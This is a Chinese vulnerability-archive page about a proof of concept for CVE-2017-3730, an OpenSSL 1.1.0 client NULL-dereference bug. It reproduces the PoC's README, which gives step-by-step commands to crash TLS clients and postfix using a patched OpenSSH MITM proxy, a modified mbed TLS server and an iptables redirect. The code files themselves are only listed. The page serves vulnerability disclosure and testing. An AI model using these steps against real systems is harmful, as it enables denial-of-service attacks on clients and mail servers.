POC详情: 246108730c498986d3a8f6e573df4160e0b6332a

来源
关联漏洞
标题: OpenSSL 代码问题漏洞 (CVE-2017-3730)
描述:OpenSSL是OpenSSL团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 OpenSSL 1.1.0d之前的1.1.0版本中存在代码问题漏洞。攻击者可利用该漏洞造成客户端崩溃(空指针逆向引用)。
描述
OpenSSL CVE-2017-3730 proof-of-concept
介绍
# CVE-2017-3730
OpenSSL CVE-2017-3730 proof-of-concept

## Using OpenSSH as a proxy to patch DH values on the fly

- Create an SSL server using a ciphersuite like ```DHE-PSK-WITH-AES-256-GCM-SHA384```. Let's say it runs on 10.0.2.2 port 8899
- Get openssh-7.4p1
- Apply patch
- Build it
- Run it like:
```
./ssh -vvv -N -D 1085 -o TCPKeepAlive=yes -o ServerAliveInterval=60 localhost
```
- In a different terminal create a file ```~/.tsocks.conf``` with this content:
```
server = 127.0.0.1
server_port = 1085
server_type = 5
local = 127.0.0.0/255.255.255.0
```
- ```export TSOCKS_CONF_FILE=`realpath ~/.tsocks.conf````
- ```tsocks```
- This creates a shell in which all network traffic flows through our "evil" proxy
- ```openssl s_client -connect 10.0.2.2:8899 -psk AA```
- crash

## Modify mbed TLS to serve invalid DH parameter

- Get https://github.com/ARMmbed/mbedtls/archive/mbedtls-2.4.1.tar.gz
- Apply ```mbedtls-2.4.1-patch.txt```
- make -j4 programs
- Run server: ```programs/ssl/ssl_server2 force_ciphersuite=TLS-DHE-RSA-WITH-AES-256-GCM-SHA384```
- Connect to it with OpenSSL 1.1.0 client
- crash

## Crashing postfix remotely

- Compile postfix with OpenSSL 1.1.0
- Compile ```crash-postfix.c``` against the PATCHED mbed TLS (see above)
- What I did was run postfix in a VM and run ```crash-postfix``` on the host:
- ```iptables -t nat -A OUTPUT -p tcp --dport 25 -j DNAT --to-destination 10.0.2.2:8888```
- Start ```crash-postfix```
- Run postfix: ```posttls-finger 10.0.2.2```
- Crash
文件快照

[4.0K] /data/pocs/246108730c498986d3a8f6e573df4160e0b6332a ├── [5.5K] crash-postfix.c ├── [1.0K] mbedtls-2.4.1-patch.txt ├── [2.6K] openssh-7.4p1-mitm-patch.txt └── [1.5K] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。